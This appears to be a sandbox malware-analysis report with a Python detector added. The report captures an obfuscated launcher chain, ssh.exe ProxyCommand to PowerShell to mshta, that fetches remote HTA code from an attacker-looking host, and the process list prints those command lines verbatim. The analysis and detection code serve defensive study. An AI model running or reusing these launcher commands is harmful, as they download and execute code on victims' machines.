                                2024-12-31 14:41:47 UTC958INData Raw: 23 63 66 2d 77 72 61 70 70 65 72 20 61 2c 23 63 66 2d 77 72 61 70 70 65 72 20 61 62 62 72 2c 23 63 66 2d 77 72 61 70 70 65 72 20 61 72 74 69 63 6c 65 2c 23 63 66 2d 77 72 61 70 70 65 72 20 61 73 69 64 65 2c 23 63 66 2d 77 72 61 70 70 65 72 20 62 2c 23 63 66 2d 77 72 61 70 70 65 72 20 62 69 67 2c 23 63 66 2d 77 72 61 70 70 65 72 20 62 6c 6f 63 6b 71 75 6f 74 65 2c 23 63 66 2d 77 72 61 70 70 65 72 20 62 6f 64 79 2c 23 63 66 2d 77 72 61 70 70 65 72 20 63 61 6e 76 61 73 2c 23 63 66 2d 77 72 61 70 70 65 72 20 63 61 70 74 69 6f 6e 2c 23 63 66 2d 77 72 61 70 70 65 72 20 63 65 6e 74 65 72 2c 23 63 66 2d 77 72 61 70 70 65 72 20 63 69 74 65 2c 23 63 66 2d 77 72 61 70 70 65 72 20 63 6f 64 65 2c 23 63 66 2d 77 72 61 70 70 65 72 20 64 64 2c 23 63 66 2d 77 72 61 70 70
                                Data Ascii: #cf-wrapper a,#cf-wrapper abbr,#cf-wrapper article,#cf-wrapper aside,#cf-wrapper b,#cf-wrapper big,#cf-wrapper blockquote,#cf-wrapper body,#cf-wrapper canvas,#cf-wrapper caption,#cf-wrapper center,#cf-wrapper cite,#cf-wrapper code,#cf-wrapper dd,#cf-wrapp
                                2024-12-31 14:41:47 UTC1369INData Raw: 65 2c 23 63 66 2d 77 72 61 70 70 65 72 20 73 74 72 6f 6e 67 2c 23 63 66 2d 77 72 61 70 70 65 72 20 73 75 62 2c 23 63 66 2d 77 72 61 70 70 65 72 20 73 75 6d 6d 61 72 79 2c 23 63 66 2d 77 72 61 70 70 65 72 20 73 75 70 2c 23 63 66 2d 77 72 61 70 70 65 72 20 74 61 62 6c 65 2c 23 63 66 2d 77 72 61 70 70 65 72 20 74 62 6f 64 79 2c 23 63 66 2d 77 72 61 70 70 65 72 20 74 64 2c 23 63 66 2d 77 72 61 70 70 65 72 20 74 66 6f 6f 74 2c 23 63 66 2d 77 72 61 70 70 65 72 20 74 68 2c 23 63 66 2d 77 72 61 70 70 65 72 20 74 68 65 61 64 2c 23 63 66 2d 77 72 61 70 70 65 72 20 74 72 2c 23 63 66 2d 77 72 61 70 70 65 72 20 74 74 2c 23 63 66 2d 77 72 61 70 70 65 72 20 75 2c 23 63 66 2d 77 72 61 70 70 65 72 20 75 6c 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 3b 62 6f
                                Data Ascii: e,#cf-wrapper strong,#cf-wrapper sub,#cf-wrapper summary,#cf-wrapper sup,#cf-wrapper table,#cf-wrapper tbody,#cf-wrapper td,#cf-wrapper tfoot,#cf-wrapper th,#cf-wrapper thead,#cf-wrapper tr,#cf-wrapper tt,#cf-wrapper u,#cf-wrapper ul{margin:0;padding:0;bo
                                2024-12-31 14:41:47 UTC1369INData Raw: 31 2e 35 21 69 6d 70 6f 72 74 61 6e 74 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 21 69 6d 70 6f 72 74 61 6e 74 3b 6c 65 74 74 65 72 2d 73 70 61 63 69 6e 67 3a 6e 6f 72 6d 61 6c 3b 2d 77 65 62 6b 69 74 2d 74 61 70 2d 68 69 67 68 6c 69 67 68 74 2d 63 6f 6c 6f 72 3a 72 67 62 61 28 32 34 36 2c 31 33 39 2c 33 31 2c 2e 33 29 3b 2d 77 65 62 6b 69 74 2d 66 6f 6e 74 2d 73 6d 6f 6f 74 68 69 6e 67 3a 61 6e 74 69 61 6c 69 61 73 65 64 7d 23 63 66 2d 77 72 61 70 70 65 72 20 2e 63 66 2d 73 65 63 74 69 6f 6e 2c 23 63 66 2d 77 72 61 70 70 65 72 20 73 65 63 74 69 6f 6e 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 30 20 30 3b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 3b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 32 65 6d 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 65 6d
                                Data Ascii: 1.5!important;text-decoration:none!important;letter-spacing:normal;-webkit-tap-highlight-color:rgba(246,139,31,.3);-webkit-font-smoothing:antialiased}#cf-wrapper .cf-section,#cf-wrapper section{background:0 0;display:block;margin-bottom:2em;margin-top:2em
                                2024-12-31 14:41:47 UTC1369INData Raw: 6c 64 28 32 6e 29 2c 23 63 66 2d 77 72 61 70 70 65 72 20 2e 63 66 2d 63 6f 6c 75 6d 6e 73 2e 63 6f 6c 73 2d 34 3e 2e 63 66 2d 63 6f 6c 75 6d 6e 3a 6e 74 68 2d 63 68 69 6c 64 28 32 6e 29 2c 23 63 66 2d 77 72 61 70 70 65 72 20 2e 63 66 2d 63 6f 6c 75 6d 6e 73 2e 66 6f 75 72 3e 2e 63 66 2d 63 6f 6c 75 6d 6e 3a 6e 74 68 2d 63 68 69 6c 64 28 32 6e 29 2c 23 63 66 2d 77 72 61 70 70 65 72 20 2e 63 66 2d 63 6f 6c 75 6d 6e 73 2e 74 77 6f 3e 2e 63 66 2d 63 6f 6c 75 6d 6e 3a 6e 74 68 2d 63 68 69 6c 64 28 32 6e 29 7b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 32 32 2e 35 70 78 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 23 63 66 2d 77 72 61 70 70 65 72 20 2e 63 66 2d 63 6f 6c 75 6d 6e 73 2e 63 6f 6c 73 2d 32 3e 2e 63 66 2d 63 6f 6c 75 6d 6e 3a 6e 74 68 2d 63 68 69
                                Data Ascii: ld(2n),#cf-wrapper .cf-columns.cols-4>.cf-column:nth-child(2n),#cf-wrapper .cf-columns.four>.cf-column:nth-child(2n),#cf-wrapper .cf-columns.two>.cf-column:nth-child(2n){padding-left:22.5px;padding-right:0}#cf-wrapper .cf-columns.cols-2>.cf-column:nth-chi
                                2024-12-31 14:41:47 UTC1369INData Raw: 29 2c 23 63 66 2d 77 72 61 70 70 65 72 20 2e 63 66 2d 63 6f 6c 75 6d 6e 73 2e 66 6f 75 72 3e 2e 63 66 2d 63 6f 6c 75 6d 6e 3a 6e 74 68 2d 63 68 69 6c 64 28 6f 64 64 29 7b 63 6c 65 61 72 3a 6e 6f 6e 65 7d 23 63 66 2d 77 72 61 70 70 65 72 20 2e 63 66 2d 63 6f 6c 75 6d 6e 73 2e 63 6f 6c 73 2d 34 3e 2e 63 66 2d 63 6f 6c 75 6d 6e 3a 66 69 72 73 74 2d 63 68 69 6c 64 2c 23 63 66 2d 77 72 61 70 70 65 72 20 2e 63 66 2d 63 6f 6c 75 6d 6e 73 2e 63 6f 6c 73 2d 34 3e 2e 63 66 2d 63 6f 6c 75 6d 6e 3a 6e 74 68 2d 63 68 69 6c 64 28 34 6e 2b 31 29 2c 23 63 66 2d 77 72 61 70 70 65 72 20 2e 63 66 2d 63 6f 6c 75 6d 6e 73 2e 66 6f 75 72 3e 2e 63 66 2d 63 6f 6c 75 6d 6e 3a 66 69 72 73 74 2d 63 68 69 6c 64 2c 23 63 66 2d 77 72 61 70 70 65 72 20 2e 63 66 2d 63 6f 6c 75 6d 6e 73
                                Data Ascii: ),#cf-wrapper .cf-columns.four>.cf-column:nth-child(odd){clear:none}#cf-wrapper .cf-columns.cols-4>.cf-column:first-child,#cf-wrapper .cf-columns.cols-4>.cf-column:nth-child(4n+1),#cf-wrapper .cf-columns.four>.cf-column:first-child,#cf-wrapper .cf-columns
                                2024-12-31 14:41:47 UTC1369INData Raw: 30 3b 70 61 64 64 69 6e 67 3a 30 7d 23 63 66 2d 77 72 61 70 70 65 72 20 68 31 2c 23 63 66 2d 77 72 61 70 70 65 72 20 68 32 2c 23 63 66 2d 77 72 61 70 70 65 72 20 68 33 7b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 34 30 30 7d 23 63 66 2d 77 72 61 70 70 65 72 20 68 34 2c 23 63 66 2d 77 72 61 70 70 65 72 20 68 35 2c 23 63 66 2d 77 72 61 70 70 65 72 20 68 36 2c 23 63 66 2d 77 72 61 70 70 65 72 20 73 74 72 6f 6e 67 7b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 36 30 30 7d 23 63 66 2d 77 72 61 70 70 65 72 20 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 33 36 70 78 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 32 7d 23 63 66 2d 77 72 61 70 70 65 72 20 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 33 30 70 78 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 33 7d 23 63 66 2d 77 72 61 70 70 65
                                Data Ascii: 0;padding:0}#cf-wrapper h1,#cf-wrapper h2,#cf-wrapper h3{font-weight:400}#cf-wrapper h4,#cf-wrapper h5,#cf-wrapper h6,#cf-wrapper strong{font-weight:600}#cf-wrapper h1{font-size:36px;line-height:1.2}#cf-wrapper h2{font-size:30px;line-height:1.3}#cf-wrappe
                                2024-12-31 14:41:47 UTC1369INData Raw: 68 32 2b 68 34 2c 23 63 66 2d 77 72 61 70 70 65 72 20 68 32 2b 68 35 2c 23 63 66 2d 77 72 61 70 70 65 72 20 68 32 2b 68 36 2c 23 63 66 2d 77 72 61 70 70 65 72 20 68 33 2b 68 35 2c 23 63 66 2d 77 72 61 70 70 65 72 20 68 33 2b 68 36 2c 23 63 66 2d 77 72 61 70 70 65 72 20 68 33 2b 70 2c 23 63 66 2d 77 72 61 70 70 65 72 20 68 34 2b 70 2c 23 63 66 2d 77 72 61 70 70 65 72 20 68 35 2b 6f 6c 2c 23 63 66 2d 77 72 61 70 70 65 72 20 68 35 2b 70 2c 23 63 66 2d 77 72 61 70 70 65 72 20 68 35 2b 75 6c 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2e 35 65 6d 7d 23 63 66 2d 77 72 61 70 70 65 72 20 2e 63 66 2d 62 74 6e 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 74 72 61 6e 73 70 61 72 65 6e 74 3b 62 6f 72 64 65 72 3a 31 70 78 20 73 6f 6c 69 64 20 23 39 39 39 3b 63 6f 6c
                                Data Ascii: h2+h4,#cf-wrapper h2+h5,#cf-wrapper h2+h6,#cf-wrapper h3+h5,#cf-wrapper h3+h6,#cf-wrapper h3+p,#cf-wrapper h4+p,#cf-wrapper h5+ol,#cf-wrapper h5+p,#cf-wrapper h5+ul{margin-top:.5em}#cf-wrapper .cf-btn{background-color:transparent;border:1px solid #999;col
                                2024-12-31 14:41:47 UTC1369INData Raw: 3a 23 36 32 61 31 64 38 3b 62 6f 72 64 65 72 3a 31 70 78 20 73 6f 6c 69 64 20 23 31 36 33 39 35 39 3b 63 6f 6c 6f 72 3a 23 66 66 66 7d 23 63 66 2d 77 72 61 70 70 65 72 20 2e 63 66 2d 62 74 6e 2d 64 61 6e 67 65 72 2c 23 63 66 2d 77 72 61 70 70 65 72 20 2e 63 66 2d 62 74 6e 2d 65 72 72 6f 72 2c 23 63 66 2d 77 72 61 70 70 65 72 20 2e 63 66 2d 62 74 6e 2d 69 6d 70 6f 72 74 61 6e 74 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 62 64 32 34 32 36 3b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 74 72 61 6e 73 70 61 72 65 6e 74 3b 63 6f 6c 6f 72 3a 23 66 66 66 7d 23 63 66 2d 77 72 61 70 70 65 72 20 2e 63 66 2d 62 74 6e 2d 64 61 6e 67 65 72 3a 68 6f 76 65 72 2c 23 63 66 2d 77 72 61 70 70 65 72 20 2e 63 66 2d 62 74 6e 2d 65 72 72 6f 72 3a 68 6f 76 65 72 2c 23
                                Data Ascii: :#62a1d8;border:1px solid #163959;color:#fff}#cf-wrapper .cf-btn-danger,#cf-wrapper .cf-btn-error,#cf-wrapper .cf-btn-important{background-color:#bd2426;border-color:transparent;color:#fff}#cf-wrapper .cf-btn-danger:hover,#cf-wrapper .cf-btn-error:hover,#
                                2024-12-31 14:41:47 UTC1369INData Raw: 61 63 65 3a 6e 6f 77 72 61 70 7d 23 63 66 2d 77 72 61 70 70 65 72 20 69 6e 70 75 74 2c 23 63 66 2d 77 72 61 70 70 65 72 20 73 65 6c 65 63 74 2c 23 63 66 2d 77 72 61 70 70 65 72 20 74 65 78 74 61 72 65 61 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 21 69 6d 70 6f 72 74 61 6e 74 3b 62 6f 72 64 65 72 3a 31 70 78 20 73 6f 6c 69 64 20 23 39 39 39 21 69 6d 70 6f 72 74 61 6e 74 3b 63 6f 6c 6f 72 3a 23 34 30 34 30 34 30 21 69 6d 70 6f 72 74 61 6e 74 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 38 36 36 36 37 65 6d 21 69 6d 70 6f 72 74 61 6e 74 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 32 34 21 69 6d 70 6f 72 74 61 6e 74 3b 6d 61 72 67 69 6e 3a 30 20 30 20 31 65 6d 21 69 6d 70 6f 72 74 61 6e 74 3b 6d 61 78 2d 77 69 64 74 68 3a 31 30 30 25 21 69 6d 70 6f 72 74 61 6e
                                Data Ascii: ace:nowrap}#cf-wrapper input,#cf-wrapper select,#cf-wrapper textarea{background:#fff!important;border:1px solid #999!important;color:#404040!important;font-size:.86667em!important;line-height:1.24!important;margin:0 0 1em!important;max-width:100%!importan
                                2024-12-31 14:41:47 UTC1369INData Raw: 3a 23 34 30 34 30 34 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 33 70 78 3b 70 61 64 64 69 6e 67 3a 37 2e 35 70 78 20 31 35 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 6d 69 64 64 6c 65 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 32 70 78 7d 23 63 66 2d 77 72 61 70 70 65 72 20 2e 63 66 2d 61 6c 65 72 74 3a 65 6d 70 74 79 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 7d 23 63 66 2d 77 72 61 70 70 65 72 20 2e 63 66 2d 61 6c 65 72 74 20 2e 63 66 2d 63 6c 6f 73 65 7b 62 6f 72 64 65 72 3a 31 70 78 20 73 6f 6c 69 64 20 74 72 61 6e 73 70 61 72 65 6e 74 3b 63 6f 6c 6f 72 3a 69 6e 68 65 72 69 74 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 38 2e 37 35 70 78 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 3b 70 61 64 64 69 6e
                                Data Ascii: :#404040;font-size:13px;padding:7.5px 15px;position:relative;vertical-align:middle;border-radius:2px}#cf-wrapper .cf-alert:empty{display:none}#cf-wrapper .cf-alert .cf-close{border:1px solid transparent;color:inherit;font-size:18.75px;line-height:1;paddin


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.5 | 49727 | 172.67.129.82 | 443 | 6464 | C:\Windows\System32\mshta.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-31 14:41:48 UTC | 439 | OUT | GET /cdn-cgi/images/icon-exclamation.png?1376755637 HTTP/1.1
                                Accept: */*
                                Referer: https://awakka-aws3.zoho-documents.com/hekko.mp4
                                Accept-Language: en-CH
                                UA-CPU: AMD64
                                Accept-Encoding: gzip, deflate
                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                Host: awakka-aws3.zoho-documents.com
                                Connection: Keep-Alive
2024-12-31 14:41:48 UTC | 409 | IN | HTTP/1.1 200 OK
                                Date: Tue, 31 Dec 2024 14:41:48 GMT
                                Content-Type: image/png
                                Content-Length: 452
                                Connection: close
                                Last-Modified: Fri, 06 Dec 2024 15:30:33 GMT
                                ETag: "67531899-1c4"
                                Server: cloudflare
                                CF-RAY: 8fab0856bd124400-EWR
                                X-Frame-Options: DENY
                                X-Content-Type-Options: nosniff
                                Expires: Tue, 31 Dec 2024 16:41:48 GMT
                                Cache-Control: max-age=7200
                                Cache-Control: public
                                Accept-Ranges: bytes
                                2024-12-31 14:41:48 UTC452INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 36 00 00 00 36 08 03 00 00 00 bb 9b 9a ef 00 00 00 33 50 4c 54 45 c1 45 3f c1 45 3f c1 45 3f c1 45 3f c1 45 3f c1 45 3f c1 45 3f c1 45 3f c1 45 3f c1 45 3f c1 45 3f c1 45 3f c1 45 3f c1 45 3f c1 45 3f c1 45 3f c1 45 3f ab b2 22 ed 00 00 00 11 74 52 4e 53 00 40 30 10 60 8f bf ff ef 7f af 9f df 20 50 cf 70 60 82 c8 9b 00 00 01 2f 49 44 41 54 78 01 bd d3 05 d2 b4 30 10 06 e1 8e 6c de c1 36 dc ff b2 9f 2b 95 c9 12 7e 79 4a 91 46 22 b8 c2 8b c8 80 94 6f 45 1f ac 4c 81 33 f2 ac 03 5b 1e 95 69 32 b5 94 6e 98 57 79 4a c4 91 8a 7a 26 9a 82 a9 af a4 46 95 f5 d0 1a fb 95 c7 62 bf b2 f2 e9 70 7e e3 a7 a0 df ee 7c 3a 74 35 f1 6d b3 b3 99 66 70 af 69 f2 2f 65 ef c7 fa 99 25 de 25 1b c9 b4 f0 6e d2 50 a6 ed fb 65
                                Data Ascii: PNGIHDR663PLTEE?E?E?E?E?E?E?E?E?E?E?E?E?E?E?E?E?"tRNS@0` Pp`/IDATx0l6+~yJF"oEL3[i2nWyJz&Fbp~|:t5mfpi/e%%nPe



                                Target ID:0
                                Start time:09:41:41
                                Start date:31/12/2024
                                Path:C:\Windows\System32\OpenSSH\ssh.exe
                                Wow64 process (32bit):false
                                Commandline:"C:\Windows\System32\OpenSSH\ssh.exe" -o ProxyCommand="powershell powershell -Command 'UqtSm[`6fHA6[bo=yymshta https://awakka-aws3.zoho-documents.com/hekko.mp4UqtSm[`6fHA6[bo=yy'.SubString(18, 54)" .
                                Imagebase:0x7ff7a88e0000
                                File size:946'176 bytes
                                MD5 hash:C05426E6F6DFB30FB78FBA874A2FF7DC
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:moderate
                                Has exited:false

                                Target ID:1
                                Start time:09:41:41
                                Start date:31/12/2024
                                Path:C:\Windows\System32\conhost.exe
                                Wow64 process (32bit):false
                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Imagebase:0x7ff6d64d0000
                                File size:862'208 bytes
                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:high
                                Has exited:false

                                Target ID:3
                                Start time:09:41:42
                                Start date:31/12/2024
                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                Wow64 process (32bit):false
                                Commandline:powershell powershell -Command 'UqtSm[`6fHA6[bo=yymshta https://awakka-aws3.zoho-documents.com/hekko.mp4UqtSm[`6fHA6[bo=yy'.SubString(18, 54)
                                Imagebase:0x7ff7be880000
                                File size:452'608 bytes
                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:high
                                Has exited:true

                                Target ID:4
                                Start time:09:41:44
                                Start date:31/12/2024
                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                Wow64 process (32bit):false
                                Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "mshta https://awakka-aws3.zoho-documents.com/hekko.mp4"
                                Imagebase:0x7ff7be880000
                                File size:452'608 bytes
                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:high
                                Has exited:true

                                Target ID:5
                                Start time:09:41:44
                                Start date:31/12/2024
                                Path:C:\Windows\System32\mshta.exe
                                Wow64 process (32bit):false
                                Commandline:"C:\Windows\system32\mshta.exe" https://awakka-aws3.zoho-documents.com/hekko.mp4
                                Imagebase:0x7ff7c5190000
                                File size:14'848 bytes
                                MD5 hash:0B4340ED812DC82CE636C00FA5C9BEF2
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:moderate
                                Has exited:false

                                Target ID:6
                                Start time:09:41:46
                                Start date:31/12/2024
                                Path:C:\Windows\System32\svchost.exe
                                Wow64 process (32bit):false
                                Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                Imagebase:0x7ff7e52b0000
                                File size:55'320 bytes
                                MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:high
                                Has exited:false
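The process list above records the whole chain: ssh.exe is started with -o ProxyCommand so that it spawns powershell; the outer powershell evaluates .SubString(18, 54) on a literal padded with 18 junk characters on either side, which yields `mshta https://awakka-aws3.zoho-documents.com/hekko.mp4`; the inner powershell runs that, and mshta.exe fetches the URL. In this run Cloudflare answered the request with 403, so the HTA stage itself was never captured and only the launcher chain can be judged. The following Python is an added example, not part of the Joe Sandbox report or of the sample: it statically resolves the SubString expression (so the attacker's PowerShell is never executed), peels the nested powershell wrappers, walks the process tree, and flags ssh.exe processes whose ProxyCommand or descendants launch a known LOLBin. The process tuples are constructed from the command lines shown above; PIDs and parent PIDs other than 6464 (mshta.exe, from the HTTP session table) are hypothetical, and the LOLBin list is an assumption of this example, not a rule taken from the report.

```python
import base64
import re

# Constructed sample input: the command lines from this report's process list.
# PIDs/PPIDs are hypothetical except 6464 (mshta.exe in the HTTP session table).
SAMPLE_PROCESSES = [
    (7096, 1000, r"C:\Windows\System32\OpenSSH\ssh.exe",
     r""""C:\Windows\System32\OpenSSH\ssh.exe" -o ProxyCommand="powershell powershell -Command 'UqtSm[`6fHA6[bo=yymshta https://awakka-aws3.zoho-documents.com/hekko.mp4UqtSm[`6fHA6[bo=yy'.SubString(18, 54)" ."""),
    (6528, 7096, r"C:\Windows\System32\conhost.exe",
     r"C:\Windows\system32\conhost.exe 0xffffffff -ForceV1"),
    (7140, 7096, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     r"powershell powershell -Command 'UqtSm[`6fHA6[bo=yymshta https://awakka-aws3.zoho-documents.com/hekko.mp4UqtSm[`6fHA6[bo=yy'.SubString(18, 54)"),
    (7200, 7140, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "mshta https://awakka-aws3.zoho-documents.com/hekko.mp4"'),
    (6464, 7200, r"C:\Windows\System32\mshta.exe",
     r'"C:\Windows\system32\mshta.exe" https://awakka-aws3.zoho-documents.com/hekko.mp4'),
]

PROXYCMD_RE = re.compile(r'ProxyCommand=(?:"([^"]*)"|(\S+))', re.I)
# PowerShell single-quoted literal ('' escapes a quote) followed by .SubString(start[, length])
SUBSTR_RE = re.compile(r"'((?:[^']|'')*)'\s*\.\s*SubString\s*\(\s*(\d+)\s*(?:,\s*(\d+)\s*)?\)", re.I)
PS_IMAGE_RE = re.compile(r"(^|[\\/])(powershell|pwsh)(\.exe)?$", re.I)
COMMAND_FLAGS = {"-c", "-command"}
ENCODED_FLAGS = {"-e", "-enc", "-encodedcommand"}
ONEARG_FLAGS = {"-w", "-windowstyle", "-ep", "-executionpolicy", "-v", "-version"}
LOLBINS = {"mshta", "powershell", "pwsh", "cmd", "rundll32", "regsvr32", "certutil",
           "wscript", "cscript", "bitsadmin", "msiexec", "curl"}  # assumed list, not from the report

def _tokens(cmd):
    """Split a Windows command line on whitespace, keeping "quoted spans" whole.
    (shlex in POSIX mode would eat the backslashes in paths.)"""
    return [t.strip('"') for t in re.findall(r'"[^"]*"|\S+', cmd)]

def _basename(path):
    return re.sub(r"^.*[\\/]", "", path).lower()

def proxy_command(cmdline):
    """Return the value of ssh's -o ProxyCommand=... option, or None."""
    m = PROXYCMD_RE.search(cmdline)
    return None if m is None else (m.group(1) if m.group(1) is not None else m.group(2))

def resolve_substrings(text):
    """Evaluate every 'literal'.SubString(start[, length]) in text without running
    PowerShell. Bounds follow .NET: start <= len and start + length <= len; anything
    else would throw ArgumentOutOfRangeException at runtime, so we raise instead."""
    def _eval(m):
        literal = m.group(1).replace("''", "'")
        start = int(m.group(2))
        length = int(m.group(3)) if m.group(3) is not None else len(literal) - start
        if start > len(literal) or length < 0 or start + length > len(literal):
            raise ValueError(f"SubString({start}, {length}) out of range for {len(literal)}-char literal")
        return literal[start:start + length]
    return SUBSTR_RE.sub(_eval, text)

def strip_powershell_wrappers(cmd):
    """Peel nested 'powershell [flags] -Command <payload>' layers (decoding
    -EncodedCommand where present) and return the innermost payload."""
    while True:
        toks = _tokens(cmd)
        if not toks or not PS_IMAGE_RE.search(toks[0]):
            return cmd.strip()
        i, decoded = 1, None
        while i < len(toks) and toks[i].startswith("-"):
            flag = toks[i].lower()
            if flag in ENCODED_FLAGS:  # -EncodedCommand carries base64 of UTF-16LE script
                decoded = base64.b64decode(toks[i + 1]).decode("utf-16-le") if i + 1 < len(toks) else ""
                break
            if flag in COMMAND_FLAGS:
                i += 1
                break
            i += 2 if flag in ONEARG_FLAGS else 1
        cmd = decoded if decoded is not None else " ".join(toks[i:])

def _descendants(pid, by_parent):
    names, stack = [], [pid]
    while stack:
        for child, image in by_parent.get(stack.pop(), []):
            names.append(_basename(image))
            stack.append(child)
    return names

def analyse(processes):
    """Flag ssh.exe processes whose ProxyCommand resolves to a LOLBin launch or whose
    descendants include one. processes: iterable of (pid, ppid, image, cmdline)."""
    by_parent = {}
    for pid, ppid, image, _ in processes:
        by_parent.setdefault(ppid, []).append((pid, image))
    findings = []
    for pid, _, image, cmdline in processes:
        proxy = proxy_command(cmdline) if _basename(image) == "ssh.exe" else None
        if proxy is None:
            continue
        payload = strip_powershell_wrappers(resolve_substrings(proxy))
        toks = _tokens(payload)
        launcher = re.sub(r"\.exe$", "", _basename(toks[0])) if toks else ""
        descendants = _descendants(pid, by_parent)
        if launcher in LOLBINS or {re.sub(r"\.exe$", "", d) for d in descendants} & LOLBINS:
            findings.append({"pid": pid, "launcher": launcher, "payload": payload,
                             "urls": re.findall(r"https?://[^\s\"']+", payload),
                             "descendants": descendants})
    return findings
```

Calling `analyse(SAMPLE_PROCESSES)` yields a single finding for the ssh.exe process with launcher `mshta`, the de-obfuscated payload and URL, and the descendant chain conhost.exe, powershell.exe, powershell.exe, mshta.exe. In production the same tuples would come from process-creation telemetry (Sysmon Event ID 1 or Security 4688 with command-line auditing). The static resolver only covers single-quoted literals followed by SubString; variants built from Replace, -join or char arrays need additional evaluators, and the absence of a captured HTA here means the payload's behaviour past mshta.exe remains unknown.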

                                  Memory Dump Source
                                  • Source File: 00000004.00000002.2349616372.00007FF848650000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848650000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_7ff848650000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 50a265efbff165e9494a9a7d6740091d4d4012cd19623dbda27a304ab0e77661
                                  • Instruction ID: bf9f79226681f7a1aa5f5f8c3810a63f49f331769af2ff52573c1dafad02a3d3
                                  • Opcode Fuzzy Hash: 50a265efbff165e9494a9a7d6740091d4d4012cd19623dbda27a304ab0e77661
                                  • Instruction Fuzzy Hash: 7B01677111CB0C4FD744EF0CE451AA5B7E0FB95364F50056DE58AC3661DB36E882CB45
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.3568124866.000001BDC3CD0000.00000010.00000800.00020000.00000000.sdmp, Offset: 000001BDC3CD0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_1bdc3cd0000_mshta.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 810f81081c0cb5d300cc3b36cee436ae8f7401916ad1b7d2a8efc543ff71aa18
                                  • Instruction ID: 7638cade43da6f3a7eb88bc1387a26807ab0a7c224c3c2c58bd627c3b98bc6b1
                                  • Opcode Fuzzy Hash: 810f81081c0cb5d300cc3b36cee436ae8f7401916ad1b7d2a8efc543ff71aa18
                                  • Instruction Fuzzy Hash: B490021849541655D51811961D852DC6440A388260FE44484941694145EA6D03969162